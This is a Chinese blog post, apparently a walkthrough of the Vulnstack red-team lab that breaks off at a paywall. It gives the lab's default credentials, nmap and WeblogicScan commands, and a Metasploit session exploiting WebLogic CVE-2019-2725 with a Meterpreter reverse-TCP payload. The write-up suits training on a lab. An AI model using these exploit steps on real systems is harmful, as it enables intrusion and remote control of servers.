ATT&CK实战系列——红队实战(二)

已于 2022-04-14 20:33:18 修改
阅读量5.0k 收藏 5
点赞数 2
分类专栏: Vulstack 文章标签: 安全
于 2022-02-23 17:06:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Demonering/article/details/123094588
版权

目录

环境配置

环境说明

信息收集

Nmap进行端口探测

 获得信息

漏洞检测

检测weblogic是否存在漏洞

漏洞利用

CS上线

连接到团队服务器

Windows连接

添加监听器

 MSF派生shell

内网信息收集

内网渗透的简单思路

 内网主机探活+端口扫描

Run Mimikatz

 添加smb监听器

 提权

横向提权

权限维持 

环境配置

首先在VMware->编辑->虚拟网络编辑器里 更改子网ip为192.168.111.0

环境说明

  • DC

    IP:10.10.10.10

    OS:Windows 2012

  • WEB(初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去)

    IP1:10.10.10.80

    IP2:192.168.111.80

    OS:Windows 2008

  • PC

    IP1:10.10.10.201

    IP2:192.168.111.201

    OS:Windows 7

  • 攻击机

    IP:192.168.111.128

    OS:Kali

内网网段:10.10.10.0/24

DMZ网段:192.168.111.0/24

管理员账号密码:Administrator/1qaz@WSX

先从WEB机开始,注意需要手动开启服务,在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一个 startWeblogic 的批处理,管理员身份运行它即可。

信息收集

Nmap进行端口探测

由于防火墙的存在不能使用icmp包,所以使用syn包探测

nmap -sS -sV 192.168.111.80
-sS 使用SYN半开式扫描
-sV 探测服务版本信息
SYN扫描:nmap向服务器发送一个syn数据报文,如果侦测到端口开放并返回SYN-ACK响应报文,nmap立即中断此次连接

此外也可通过常用nmap用法进行端口探测

 nmap -A -T4 -v -Pn 192.168.111.80
-A 进行全面扫描(操作系统检测、版本检测、脚本检测和跟踪路由)
-T4 设置时序,级别越高速度越快
-v 显示更加详细的信息
-Pn 无ping扫描

 获得信息

中间件:IIS7.5

操作系统:Windows Server 2008 R2

数据库:SQL server (开启了1433端口,SQL server默认端口为1433)

80端口:常见web网站

139端口:对应Samba服务

445端口:对应SMB服务

3389端口:对应开启远程桌面

7001端口:对应存在WebLogic(WebLogic是一种免费的web容器)

漏洞检测

访问80端口

 nothing at all,什么都没有

访问7001端口

 看来存在业务

检测weblogic是否存在漏洞

这里利用github上一个weblogic漏洞检测工具——WeblogicScan

 python3 WeblogicScan.py -u 192.168.111.80 -p 7001

 存在cve-2017-10271、cve-2017-3506、cve-2019-2725、cve-2019-2729历史漏洞

漏洞利用

这里使用CVE-2019-2725(Weblogic反序列化漏洞)

CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。

打开msf,search cve-2019-2725

set rhosts 192.168.111.80
set lhosts 192.168.111.128
set target Windows
set payload windows/meterpreter/reverse_tcp
msf6 > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
[*] Using configured payload cmd/unix/reverse_bash

msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set rhosts 192.168.111.80
rhosts => 192.168.111.80
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lhost 192.168.111.128
lhost => 192.168.111.128
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target Windows 
target => Windows
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > show options 

Module options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice):

   Name       Current Setting               Required  Description
   ----       ---------------               --------  -----------
   Proxies                                  no        A proxy chain of format
最低0.47元/天 解锁文章
Malabis
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ATT&CK红队评估(红日靶场
weixin_45682839的博客
04-11 2722
靶场搭建 靶场下载地址:漏洞详情 一共有三台主机:WEB、DC、PC WEB主机有两张网卡,第一张网卡NAT,第张网卡选择一个仅主机模式的网络(vmvare可以通过编辑里的虚拟网络编辑器进行添加或修改网络)这里我选择的是创建的仅主机vmnet15网络 DC主机只有一张网卡,选择和WEB第章网卡一样的vmnet15网络 PC有两张网卡,配置和WEB主机一样,第一张网卡NAT,第张网卡vmnet15 网络设置完成后进行开机 WEB主机以administrator第一次登录时没
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
ATT&CK实战系列——红队实战
Tajang的大千世界
02-22 734
红日
ATT&CK实战系列红队实战-2
Beret-81的博客
04-27 1019
ATT&CK实战系列红队实战-20、靶场简介1、信息收集2、漏洞分析2.1 漏洞扫描2.2 漏洞验证3、漏洞利用3.1 CVE-2019-2725 Getshell3.2 主机信息收集4、权限提升4.1 使用 msf 提权4.2 CVE-2019-1388:Windows UAC 本地提权4.3 获取hash&账号密码5、权限维持--注册表运行键5.1 Metasploit 内置模块5.2 命令行--手工创建6、横向渗透6.1 代理转发6.2 域内信息收集6.3 内网横向--域控1、使用
红日安全vulnstack-ATT&CK实战系列 红队实战()
遇事不决冲冲冲
02-05 6372
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
ATT&CK手册(修改版)
09-16
ATT&CK手册(修改版)
ATT&CK 知识库(企业)中文版1
08-03
**ATT&CK 知识库(企业)中文版1** **初始访问** 初始访问是攻击者进入目标网络或系统的最初步骤,通常涉及多种技术来获取对目标环境的立足点。以下是一些主要的初始访问方法: 1. **路过式下载**:攻击者利用...
ATT&CK实战系列()
m0_63206880的博客
12-22 1480
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:漏洞详情 拓扑结构大体如下: 环境搭建 Kali ip:192.168.111.135 Web Ip1:192.168.111.80 Ip2:10.10.10.80 os:windows 2008 应用:weblogic 10.3.6 mssql 2008 Pc Ip1:192.168.111.201 Ip2:10.10.10.201 Os:windows7 DC ip:10.10.10.10 .
[VulnStack] ATT&CK实战系列红队实战
weixin_45605352的博客
08-27 1074
0x00 环境搭建 靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX 配置网卡,仅主机模式192.168.10.0网段模拟内网,192.
ATT&CK 实战
GoDunTong's Blog
07-01 450
一、环境搭建 1.环境搭建测试 红日靶场地址 1.1 网络所示 开启Weblogic服务 2.信息收集 2.1 信息收集 ## 端口扫描 root@kali:~# nmap -A -sV 192.168.111.80 、漏洞探测与提权 1、漏洞利用 1.1 弱口令 Weblogic登录界面:http://192.168.111.80:7001/console/login/LoginForm.jsp 常用弱口令: system/password system/security weblogic/w
ATT&CK实战系列)琢磨篇
Zlirving_的博客
01-16 773
本文较长,思路比较混乱,主要是提高实践体验,扩展思路,师傅们轻喷 目录环境说明配置信息环境配置实验开始重见光明尝试横向总的来说 该靶机是红日安全团队出的域渗透靶机。 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境说明 内网网段:192.168.248.1/24 DMZ网段:192.168.163.1/24 测试机地址:192.168.163.129(Windows),192.168.163.132(Kali) 防火墙策略(策略设置过后
[渗透测试]ATT&CK实战 | Vulnstack 红队
Y4tacker的博客
12-06 1853
文章目录环境来源为什么写这篇文章配置nmap扫描启动smbserver共享文件服务打爆weblogic提权使用 procdump64+mimikatz 获取 win 用户明文密生成管理帐号密码用户凭证-连接域控服务器-反弹域控 shel参考文章 环境来源 来源于https://mp.weixin.qq.com/s/uLlWJdcAc6MmUyuruHygNA,尊重人家作者,还是自己去问人家要吧 为什么写这篇文章 给一些不必要细节删除,以及一些自己觉得细节的补充 配置 nmap扫描 常用端口是开放状态1
ATT&CK靶场系列
qq_1873822的博客
04-12 1785
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 拓扑结构大体如下: 靶机下载地址: https://pan.baidu.com/s/13nU-0vsGBnGejGCKzwphfQ&shfl=sharepset 提取码:41y6 开机密码:1qaz@WSX 因为要搭建一个内网环境,因此需要将虚拟机与外网隔绝,在VMware中可以通过虚拟机设置中的网络适配器来设置。 DC配置 :D
Windows系统——ATT&CK红队评估实战靶场()——CS方式
qq_44029310的博客
09-04 1694
本文涉及知识点有:环境搭建,nmap使用,weblogic反序列化漏洞利用,内网信息收集,防火墙相关,MS15-051和MS14-058提权,mimikatz抓取密码和凭证,fscan使用,SMB beacon横向移动相关,psexec横向移动相关,cobaltstrike的使用等。
ATT&CK实战系列-红队评估()WP
h1nt的博客
08-15 779
环境搭建 靶场下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 根据平台介绍,虚拟机的密码统一为1qaz@WSX 将虚拟机导入后更改WEB靶机的IPV4地址为你所使用的NAT网段中的任意地址 这里注意可能一开始WEB靶机的账号密码不对,方法是使用Administrator账号登录,然后改回来即可 在目录 C:\Oracle\Middleware\user_projects\domains\base_domain 下有startWeblog
ATT\\& CK实战
最新发布
10-10
ATT&CK(Adversarial Tactics, Techniques, and Common Knowledge)是一种基于安全领域的知识库,旨在描述和分类对抗性行为者(攻击者)在计算机系统中使用的战术、技术和常见知识。ATT&CK框架由MITRE公司开发,它提供了一种方法来理解和评估安全事件中攻击者的行为模式。 ATT&CK框架可以帮助组织和安全专业人员更好地理解攻击者的思维方式和行动路径,以便采取适当的防御措施。它提供了一个广泛的技术矩阵,用于描述攻击者使用的各种工具、技术和策略。 在实战中,ATT&CK框架可以用于指导安全团队进行威胁模拟和红队演练,以测试组织的安全防御能力。它还可以用于分析和调查安全事件,帮助确定攻击者的行动路径和所使用的技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值